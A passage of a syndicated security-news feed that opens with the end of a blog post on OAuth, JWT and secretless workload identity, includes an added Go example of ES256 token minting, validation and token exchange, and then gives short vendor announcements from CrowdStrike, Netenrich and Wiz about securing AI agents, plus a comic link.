When engineers refer to “OAuth authentication,” they are usually describing OAuth authorization combined with token-based identity verification using JWTs issued through OIDC. Recognizing that distinction prevents architectural mistakes like using raw JWTs for authorization decisions without an OAuth framework to manage their lifecycle.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">OAuth 2.1 and Workload Authentication</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">OAuth 2.1 consolidates years of security lessons into a single specification (currently in late-stage IETF draft, not yet published as a final RFC, but widely adopted by major authorization servers). It deprecates the implicit flow and resource owner password credentials flow, requires PKCE for all authorization code flows, requires refresh tokens for public clients to be either sender-constrained or one-time use (making rotation the standard implementation in practice) and recommends sender-constrained tokens through mutual TLS. For workload and machine-to-machine use cases, OAuth 2.1 standardizes how client credentials are exchanged, how access tokens are scoped and how token exchange (RFC 8693) works across environments. Emerging frameworks for AI agent interoperability, including the Model Context Protocol (MCP), depend on these principles. OAuth 2.1 enables standardized authorization between agents, services and APIs using short-lived, verifiable JWTs without persistent secrets.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Applying OAuth and JWT to workloads introduces challenges that do not exist in human authentication. Humans can use MFA, push notifications and browser logins. Workloads cannot. 
They rely on certificates, attestation or tokens, which means the traditional OAuth client credentials approach of storing a client secret in a container image or environment variable creates a persistent attack vector.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Attestation-based authentication addresses this by eliminating long-lived secrets entirely. Instead of managing stored credentials, workloads authenticate using cryptographically verifiable identity claims about their runtime environment: the cloud instance they run on, the Kubernetes namespace they belong to, the security posture of their host. The authorization server validates these claims and issues short-lived JWTs scoped to the specific resources the workload needs. The workload never handles a persistent secret, and the JWT expires after a brief window, limiting exposure if intercepted. For multicloud and hybrid environments, <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/what-identity-federation-means-for-workloads-in-cloud-native-environments/">workload identity federation</a> extends this model across cloud boundaries. A workload in one cloud presents its cryptographically signed identity token, which the target authorization server validates and exchanges for a new JWT scoped to local resources. 
This eliminates the need to provision duplicate service accounts across clouds while maintaining the same <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/secrets-management-vs-access-management-what-you-need-to-know/">secretless security model</a>.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">Choosing the Right Approach for Your Architecture</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The right implementation depends on how many clouds you operate in, whether you can modify application code and how much credential management overhead you can absorb. Each pattern below applies OAuth and JWT differently based on those constraints.</p> <h3 class="text-text-100 mt-2 -mb-1 text-base font-bold">Single Cloud, Single Identity Provider</h3> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Use cloud-native managed identities. AWS IAM roles, Azure Managed Identities and GCP Service Accounts implement OAuth and JWT internally while eliminating credential storage. Your application authenticates through the cloud’s metadata service and receives JWT access tokens without managing secrets. Kubernetes ServiceAccounts provide pod-level identity within a cluster and can be projected as OIDC tokens for federation with cloud IAM. This approach works well within a single cloud but requires federation for cross-cloud access.</p> <h3 class="text-text-100 mt-2 -mb-1 text-base font-bold">Multicloud or Hybrid Environments</h3> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Implement workload identity federation with centralized policy. Use OAuth 2.0 token exchange (RFC 8693) to enable workloads in one cloud to access resources in another. 
A workload presents its home-cloud JWT, which the target authorization server validates and exchanges for a new JWT scoped to local resources. This requires a federation platform that can validate tokens from multiple issuers and enforce consistent policy across clouds. The benefit is that you avoid provisioning duplicate service accounts and managing separate credential stores in each cloud. A single identity assertion, verified cryptographically, grants access across trust boundaries.</p> <h3 class="text-text-100 mt-2 -mb-1 text-base font-bold">Legacy Applications Without Code Changes</h3> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Use a broker or proxy pattern. A proxy intercepts outgoing requests from a microservice, handles OAuth flows, JWT validation, token refresh and credential injection transparently. The application makes standard HTTP requests without any awareness that the proxy is managing authentication. This pattern is particularly useful for AI agent and <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/mcp-authentication-and-authorization-patterns/">MCP integrations</a> where modifying the application code is not practical.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">Where to Start</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">If you are evaluating JWT vs. OAuth for a new project, start by clarifying what problem you are solving. If you need to package signed claims for stateless validation, JWT is the format. If you need to delegate and control access across services, OAuth is the framework. 
Most production systems need both: OAuth to manage the authorization lifecycle and JWT to carry the resulting access information.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">For workload authentication, the priority is eliminating static credentials. Every client secret stored in an environment variable or config file is a credential that can be leaked, stolen or reused. Moving to attestation-based authentication with short-lived JWTs issued through OAuth flows removes that attack vector entirely. Start by auditing which workloads still rely on long-lived client secrets and identify which can be migrated to identity federation or managed identities.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/product-overview/">Aembit</a> implements this model at scale. The platform uses environment attestation to prove workload identity through the OAuth 2.0 client credentials flow with cryptographic verification rather than traditional client secrets, then issues short-lived JWT access tokens with automatic refresh. The platform handles cross-cloud federation, conditional access policies and transparent credential injection so that developers never write authentication code.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">Related Reading</h2> <ul class="[li_&amp;]:mb-0 [li_&amp;]:mt-1 [li_&amp;]:gap-1 [&amp;:not(:last-child)_ul]:pb-1 [&amp;:not(:last-child)_ol]:pb-1 list-disc flex flex-col gap-1 pl-8 mb-3"> <li class="whitespace-normal break-words pl-2"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/dynamic-authorization-vs-static-secrets-rethinking-cloud-access-controls/">Dynamic Authorization vs. 
Static Secrets</a></li> <li class="whitespace-normal break-words pl-2"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/frictionless-devops-identity-management/">Frictionless Security: What DevOps Teams Really Need</a></li> <li class="whitespace-normal break-words pl-2"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/the-what-where-and-why-of-workload-identity-and-access-management/">The What, Where, and Why of Workload IAM</a></li> <li class="whitespace-normal break-words pl-2"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/aembit-adds-aws-workload-identity-federation-wif-support/">Aembit Adds AWS Workload Identity Federation Support</a></li> </ul></div> </div> </div> </div> </div><p>The post <a href="https://aembit.io/blog/the-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity/">The Trivy Compromise: The Fallacy of Secrets Management and the Case for Workload Identity</a> appeared first on <a href="https://aembit.io/">Aembit</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://aembit.io/">Aembit</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Apurva Dave">Apurva Dave</a>. Read the original post at: <a href="https://aembit.io/blog/the-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity/">https://aembit.io/blog/the-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity/</a> </p>
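The client credentials flow with local JWT validation described under "How JWT and OAuth Work Together" above, together with the RFC 8693-style token exchange the article describes for multicloud federation, as an added Go example that is not Aembit's code or code from the page: the authorization server mints an ES256 JWT carrying the granted scope, the resource server validates algorithm, signature, issuer, audience and expiry locally with only the issuer's public key and then enforces scope, and a second authorization server exchanges a home-cloud token for a locally scoped one. Standard library only; the issuer and audience URLs, the SPIFFE-style subject and the scope names are constructed placeholders.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"math/big"
	"strings"
	"time"
)

// Claims: RFC 7519 registered claims plus OAuth "scope"; "aud" is kept as one string (the RFC also allows an array).
type Claims struct {
	Iss   string `json:"iss"`
	Sub   string `json:"sub"`
	Aud   string `json:"aud"`
	Exp   int64  `json:"exp"`
	Scope string `json:"scope"`
}
var b64 = base64.RawURLEncoding

// NewIssuerKey returns a fresh P-256 signing key (a constructed demo key; a real issuer would use an HSM or KMS).
func NewIssuerKey() *ecdsa.PrivateKey {
	k, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) // crypto/rand.Read is documented never to fail (Go 1.24+)
	return k
}

// MintES256 is the authorization-server side: sign header.claims with the issuer's key (JWS wants r||s, not DER).
func MintES256(priv *ecdsa.PrivateKey, c Claims) (string, error) {
	hdr, _ := json.Marshal(map[string]string{"alg": "ES256", "typ": "JWT"})
	body, _ := json.Marshal(c) // strings and ints cannot fail to marshal
	input := b64.EncodeToString(hdr) + "." + b64.EncodeToString(body)
	digest := sha256.Sum256([]byte(input))
	r, s, err := ecdsa.Sign(rand.Reader, priv, digest[:])
	if err != nil {
		return "", err
	}
	sig := make([]byte, 64)
	r.FillBytes(sig[:32])
	s.FillBytes(sig[32:])
	return input + "." + b64.EncodeToString(sig), nil
}

// VerifyES256 is the resource-server side: a fully local check needing only the issuer's public key (e.g. from its JWKS).
func VerifyES256(token string, pub *ecdsa.PublicKey, wantIss, wantAud string, now time.Time) (c Claims, err error) {
	parts := strings.Split(token, ".")
	var hdr struct{ Alg string } // pin the algorithm: the token must never choose it (rejects "none" and HS256 key confusion)
	if raw, err := b64.DecodeString(parts[0]); len(parts) != 3 || err != nil || json.Unmarshal(raw, &hdr) != nil || hdr.Alg != "ES256" {
		return c, fmt.Errorf("malformed token or rejected header (alg=%q)", hdr.Alg)
	}
	sig, err := b64.DecodeString(parts[2])
	if err != nil || len(sig) != 64 {
		return c, fmt.Errorf("bad signature encoding")
	}
	digest := sha256.Sum256([]byte(parts[0] + "." + parts[1]))
	r, s := new(big.Int).SetBytes(sig[:32]), new(big.Int).SetBytes(sig[32:])
	if !ecdsa.Verify(pub, digest[:], r, s) {
		return c, fmt.Errorf("signature verification failed")
	}
	if raw, err := b64.DecodeString(parts[1]); err != nil || json.Unmarshal(raw, &c) != nil { // claims are trusted only now
		return c, fmt.Errorf("undecodable claims")
	}
	if c.Iss != wantIss || c.Aud != wantAud {
		return c, fmt.Errorf("token is not from %q for %q (iss=%q aud=%q)", wantIss, wantAud, c.Iss, c.Aud)
	}
	if now.Unix() >= c.Exp { // a missing exp (0) counts as expired
		return c, fmt.Errorf("token expired")
	}
	return c, nil
}

// HasScope enforces the space-delimited scopes the authorization server granted.
func HasScope(c Claims, want string) bool {
	return strings.Contains(" "+c.Scope+" ", " "+want+" ")
}

// Exchange models RFC 8693-style federation: verify the home issuer's token (minted with aud = this server), then issue a local one.
func Exchange(subjectToken string, homePub *ecdsa.PublicKey, homeIss string,
	local *ecdsa.PrivateKey, localIss, localAud, scope string, now time.Time) (string, error) {
	c, err := VerifyES256(subjectToken, homePub, homeIss, localIss, now)
	if err != nil {
		return "", fmt.Errorf("subject_token rejected: %w", err)
	}
	return MintES256(local, Claims{Iss: localIss, Sub: c.Sub, Aud: localAud,
		Exp: now.Add(5 * time.Minute).Unix(), Scope: scope})
}

func main() {
	as := NewIssuerKey()
	tok, _ := MintES256(as, Claims{Iss: "https://as.example", Sub: "spiffe://example/inventory",
		Aud: "https://orders.example", Exp: time.Now().Add(5 * time.Minute).Unix(), Scope: "orders:read"})
	c, err := VerifyES256(tok, &as.PublicKey, "https://as.example", "https://orders.example", time.Now())
	fmt.Println(err, HasScope(c, "orders:read"), HasScope(c, "orders:write"))
}
```

The resource server here never contacts the authorization server; the trade-off the article notes is that such a token cannot be revoked before `exp`, which is why the lifetime is kept to minutes.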

CrowdStrike Redefines Cybersecurity Architecture for Autonomous AI

  • Jon Swartz
  • Published date: 2026-03-23 00:00:00

None

<p>SAN FRANCISCO – As autonomous artificial intelligence (AI) agents begin to operate with system-level privileges across global enterprises, CrowdStrike Inc. has massively expanded its Falcon platform, positioning the endpoint as the critical frontline for AI governance.</p><p>The announcement at RSAC here signals a strategic shift in how organizations defend against agentic workflows that can independently execute commands, access sensitive data, and modify files. Unlike static applications, autonomous agents often perform actions that are indistinguishable from legitimate human activity, rendering traditional network controls obsolete.</p><p>CrowdStrike’s new capabilities address the Shadow AI crisis. The company revealed its sensors have detected over 1,800 distinct AI applications — totaling nearly 160 million instances — running across its customer base.</p><p>To manage this sprawl, the updated Falcon platform introduces AI Runtime Protection, real-time visibility into the scripts and commands executed by AI agents, allowing security teams to isolate compromised endpoints instantly; AI Data Detection and Response (AIDR), protection extended to the prompt layer of popular tools like ChatGPT, Claude, and Microsoft Copilot to prevent data leaks and injection attacks; and Cross-Surface Governance, which tracks AI behavior across browsers, SaaS platforms like Salesforce Inc.’s Agentforce, and cloud-native container environments.</p><p>“Security built for static applications can’t keep up with autonomous systems,” CrowdStrike President Michael Sentonas said. 
“Organizations need real-time visibility and control over AI behavior wherever it runs.”</p><p>In a move to accelerate the phase-out of legacy Security Information and Event Management (SIEM) systems, CrowdStrike also announced that its Falcon Next-Gen SIEM can now ingest and correlate telemetry from Microsoft Defender for Endpoint.</p><p>Integration allows organizations using Microsoft’s security tools to modernize their operations within the CrowdStrike ecosystem without the operational burden of deploying new sensors. The collaboration highlights a maturing industry focusing on interoperability.</p><p>“It is great to see Microsoft Defender telemetry being leveraged within Falcon Next-Gen SIEM,” said Rob Lefferts, corporate vice president for threat protection at Microsoft. “Integrations like this reinforce the importance of an open ecosystem.”</p><p>By unifying AI discovery, data flow monitoring, and third-party telemetry, CrowdStrike is attempting to close the widening gap between rapid AI adoption and security enforcement. 
As AI moves from a chat box to an autonomous worker, the endpoint is no longer just a device but the epicenter of the new digital perimeter.</p>

Netenrich Launches Cyber Risk Operations to Replace Alert-Centric Security Models

  • None
  • Published date: 2026-03-23 00:00:00

None

<p>Netenrich launched Cyber Risk Operations at RSAC 2026 Monday, a new operating model powered by its Resolution Intelligence Cloud platform that aims to move enterprise security from reactive alert management toward continuous validation of control effectiveness.</p><p>The offering targets CIOs, CTOs, and CISOs who are jointly accountable for enterprise security posture. Netenrich’s central argument is that the dominant alert-centric approach, whether MDR, XDR, or AI-enhanced SOC, optimizes for speed of alert processing without actually reducing an organization’s exposure.</p><p>“The industry has spent the last decade building ‘Alert Factories’ that optimize for speed and automation but fail to reduce actual exposure,” said Raju Chekuri, CEO of Netenrich. “Innovative CISOs know that green dashboards often mask ghost assets and silent failures. With Cyber Risk Operations, we are moving the market from reactive firefighting to predictive resistance.”</p><p>The platform is built on Google SecOps and uses Netenrich’s ACT Framework, covering attack surface, controls, and threats. Key capabilities include situational awareness that goes beyond generic threat intel to provide specific risk context, adaptive defense that automatically tracks ephemeral assets like containers that can go unmonitored for their entire lifecycle, and measurable efficacy outcomes using a Likelihood, Impact, Confidence scoring model. Netenrich cites data suggesting up to 18% of critical infrastructure goes unmonitored due to the “ghost asset” problem.</p><p>The service shifts reporting metrics from activity, such as tickets closed, to outcomes, measured as actual risk reduction. Resolution Intelligence Cloud also leverages agentic AI to bridge risk assessment and security operations.</p><p>Leading enterprises are already using the platform. 
Nuvama Group’s CTO, Harsh Jha, said the company deployed Resolution Intelligence Cloud as its analytics platform on top of Google SecOps to strengthen its security posture with data-driven execution.</p><p>Netenrich is partnering with GuidePoint Security for go-to-market distribution. Cyber Risk Operations is available immediately.</p>

Wiz Launches AI-APP to Tackle ‘New Anatomy’ of Cyber Risk

  • Jon Swartz
  • Published date: 2026-03-23 00:00:00

None

<p>SAN FRANCISCO – Security specialist Wiz (now part of Google Cloud) on Monday announced the AI Application Protection Platform (AI-APP), a solution designed to secure the increasingly complex web of models, AI agents, and data that define artificial intelligence (AI)-native development.</p><p>The move, announced at RSAC 2026, marks a significant evolution in the Cloud-Native Application Protection Platform (CNAPP) market. While traditional security tools often analyze infrastructure, identities, and applications in silos, Wiz’s new platform treats AI as a dynamic, interconnected system.</p><p>According to Wiz, the “blind spots” created by rapid AI adoption are a primary concern for CISOs. Organizations are currently juggling managed services like AWS Bedrock, SaaS ecosystems like Microsoft Copilot, and custom self-hosted frameworks.</p><p>The AI-APP addresses this by building a comprehensive inventory across all environments. A central feature, the Wiz Workload Explainer, leverages AI to scan and translate custom implementations into clear components—identifying agents and data flows that traditional deterministic scanning often misses.</p><p>The core philosophy of the new platform is that AI risk is rarely the result of a single vulnerability. Instead, risk emerges when benign conditions across different layers overlap.</p><p>“AI risk is not defined by a single issue, but by how multiple conditions come together,” the company said in a <a href="https://www.wiz.io/blog/introducing-wiz-ai-app">blog post</a>. By correlating signals across the application stack, Wiz can map real, exploitable attack paths. 
For example, the platform can identify if an AI agent has the permissions to execute code or modify infrastructure—actions that, if manipulated, could lead to catastrophic breaches.</p><p>To help teams prioritize these threats, Wiz maps identified risks against the OWASP Top 10 for LLM Applications, ensuring security teams focus on vulnerabilities like prompt injection and data leakage within a recognized compliance framework.</p><p>The platform introduces a triple-layer threat detection strategy: Model Activity, for monitoring inputs/outputs and prompt behavior; Workload Execution, to track agent activity and tool usage; and Cloud Layer, which observes API calls and identity changes.</p><p>To bolster this defense, Wiz has integrated with key partners in the Wiz Integration Network (WIN). Collaborations with Cloudflare, TrojAI, and Pillar Security allow the platform to ingest external red-teaming findings and endpoint security data, providing a “single pane of glass” for AI security.</p><p>Separately, Wiz unveiled Red Agent, an AI-powered attacker that acts as a sophisticated security researcher, but with AI speed and scale.</p><p>The Red Agent joins Wiz’s Green and Blue Agents to power agentic workflows that allow teams to operate how AI operates within their environment.</p>

Golden Pull Requests: Automating Trusted Remediation Without Breaking Builds

  • None
  • Published date: 2026-03-23 00:00:00

None

<div class="hs-featured-image-wrapper"> <a href="https://www.sonatype.com/blog/golden-pull-requests-automating-trusted-remediation-without-breaking-builds" title="" class="hs-featured-image-link"> <img decoding="async" src="https://www.sonatype.com/hubfs/blog_golden_pull_requests.jpg" alt="Image of hexagon icon alongside text spelling out Sonatype Lifecycle" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"> </a> </div><p>Modern software development <a href="https://www.sonatype.com/state-of-the-software-supply-chain/2026/software-infrastructure-growth" style="text-decoration: none;"><span style="color: #1155cc;">runs on open source</span></a>. Nearly every application is built from a combination of third-party components, transitive <a href="https://www.sonatype.com/blog/software-dependencies-a-beginners-guide" style="text-decoration: none;"><span style="color: #1155cc;">dependencies</span></a>, and rapidly evolving package ecosystems.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Aaron Linskens">Aaron Linskens</a>. Read the original post at: <a href="https://www.sonatype.com/blog/golden-pull-requests-automating-trusted-remediation-without-breaking-builds">https://www.sonatype.com/blog/golden-pull-requests-automating-trusted-remediation-without-breaking-builds</a> </p>

Randall Munroe’s XKCD ‘Eliminating the Impossible’

  • Published date: 2026-03-23 00:00:00


<figure class=" sqs-block-image-figure intrinsic "> <p> <a class=" sqs-block-image-link " href="https://xkcd.com/3210/"></a></p> <p> <img src="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=1000w" alt="XKCD 3210: Eliminating the Impossible" width="675" height="349" loading="lazy" decoding="async"></p> <figcaption class="image-caption-wrapper"> <p class=""><strong>via the comic artistry and dry wit of Randall Munroe, creator of XKCD</strong></p> </figcaption></figure><p><a href="https://www.infosecurity.us/blog/2026/3/23/randall-munroes-xkcd-eliminating-the-impossible">Permalink</a></p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.infosecurity.us/">Infosecurity.US</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Marc Handelman">Marc Handelman</a>. Read the original post at: <a href="https://xkcd.com/3210/">https://xkcd.com/3210/</a> </p>